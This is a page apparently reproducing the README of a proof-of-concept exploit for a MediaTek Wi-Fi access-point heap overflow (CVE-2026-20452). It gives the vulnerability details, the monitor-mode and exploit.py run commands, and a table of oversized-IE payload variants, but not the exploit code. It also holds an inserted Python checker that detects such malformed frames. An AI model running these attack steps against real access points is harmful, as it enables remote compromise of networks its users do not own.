## https://sploitus.com/exploit?id=CB25E601-F8DB-5A0A-9D27-2D1C005BFA43
# CVE-2026-20452: MediaTek WLAN AP Heap Overflow PoC

Proof of concept exploit for CVE-2026-20452, a heap-based buffer overflow in MediaTek's WLAN Access Point driver.

## Vulnerability

- **CVE**: CVE-2026-20452
- **CVSS**: 8.0 HIGH
- **CWE**: CWE-122 (Heap-based Buffer Overflow)
- **Subcomponent**: wlan (AP driver)
- **Attack Vector**: Adjacent Network (Wi-Fi), associated client
- **Affected**: MT7615, MT7915, MT7916, MT7981, MT7986, MT7990, MT7992, MT7993, MT6890
- **Patch ID**: WCNCR00480138
- **Bulletin**: https://corp.mediatek.com/product-security-bulletin/June-2026

## Full Article

https://www.hunt-benito.com/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/

## Requirements

- Python 3.7+
- scapy (`pip install scapy`)
- Linux with a Wi-Fi adapter supporting monitor/injection mode

## Usage

### Setup monitor mode

```bash
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface becomes wlan0mon
```

### Run the exploit

```bash
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
```

### With custom parameters

```bash
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
  --overflow-size 1024 --variant 2 --count 50 --delay 0.05
```

### IE Variants

| Variant | IE Type | Description |
|---|---|---|
| 0 | Vendor Specific (221) | Single oversized IE with OUI 00:50:43 |
| 1 | Chained Vendor IEs | Multiple small IEs to corrupt adjacent heap objects |
| 2 | HT Capabilities (45) | Oversized HT Capabilities IE |
| 3 | Extended Capabilities (127) | Oversized Extended Capabilities IE |
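As an added defender-side example (not part of this PoC or the driver code): a checker that walks the information-element TLVs of an 802.11 management-frame body and flags the length anomalies the table above describes. The HT Capabilities length comes from the 802.11 standard; the other thresholds are assumptions marked in the comments.

```python
# Added defender-side example, not part of the PoC: walk the information-element
# TLVs of an 802.11 management-frame body and flag the length anomalies the
# variant table describes. Thresholds marked "assumption" are not from the page.
HT_CAPABILITIES, EXT_CAPABILITIES, VENDOR_SPECIFIC = 45, 127, 221
HT_CAP_LEN = 26          # fixed length per IEEE 802.11
EXT_CAP_MAX_LEN = 11     # assumption: longest Extended Capabilities IE expected from real clients
VENDOR_MAX_LEN = 64      # assumption: upper bound for a sane vendor-specific IE
VENDOR_REPEAT_MAX = 4    # assumption: more repeats of one OUI than this is suspicious
MTK_OUI = bytes.fromhex("005043")  # OUI named in the variant table


def ie(eid, payload):
    # Encode one information element as ID, length, payload.
    return bytes([eid, len(payload)]) + payload


def check_ies(body):
    """Return a list of findings for an IE blob; an empty list means nothing odd."""
    findings, same_oui, off = [], 0, 0
    while off + 2 <= len(body):
        eid, ln = body[off], body[off + 1]
        payload = body[off + 2:off + 2 + ln]
        if len(payload) < ln:  # declared length runs past the end of the frame body
            findings.append(f"IE {eid} truncated: declares {ln} bytes, {len(payload)} present")
            break
        if eid == HT_CAPABILITIES and ln != HT_CAP_LEN:
            findings.append(f"HT Capabilities IE length {ln}, expected {HT_CAP_LEN}")
        elif eid == EXT_CAPABILITIES and ln > EXT_CAP_MAX_LEN:
            findings.append(f"Extended Capabilities IE length {ln} exceeds {EXT_CAP_MAX_LEN}")
        elif eid == VENDOR_SPECIFIC:
            if ln < 3:
                findings.append("Vendor Specific IE shorter than a 3-byte OUI")
            elif ln > VENDOR_MAX_LEN:
                findings.append(f"Vendor Specific IE length {ln} exceeds {VENDOR_MAX_LEN}")
            if ln >= 3 and payload[:3] == MTK_OUI:
                same_oui += 1  # count chained vendor IEs carrying the same OUI
        off += 2 + ln
    if same_oui > VENDOR_REPEAT_MAX:
        findings.append(f"{same_oui} Vendor Specific IEs with OUI 00:50:43 in one frame")
    return findings


# Constructed sample bodies (no captured traffic): benign, oversized HT, chained vendor IEs.
BENIGN = ie(0, b"lab-ssid") + ie(1, bytes(8)) + ie(HT_CAPABILITIES, bytes(HT_CAP_LEN))
OVERSIZED_HT = ie(0, b"lab-ssid") + ie(HT_CAPABILITIES, bytes(40))
CHAINED_VENDOR = ie(0, b"lab-ssid") + b"".join(ie(VENDOR_SPECIFIC, MTK_OUI + b"\x00") for _ in range(8))

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("oversized_ht", OVERSIZED_HT), ("chained", CHAINED_VENDOR)):
        print(name, check_ies(body) or "ok")
```

The same check can be run over the IE bytes of frames captured in monitor mode, or wired into a WIDS rule, to spot clients sending malformed association requests before a patched firmware is deployed.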

## Disclaimer

This tool is provided for authorized security research and educational purposes only. Transmitting on Wi-Fi frequencies may require legal authorization in your jurisdiction. Unauthorized use against systems you do not own or have explicit permission to test is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this tool.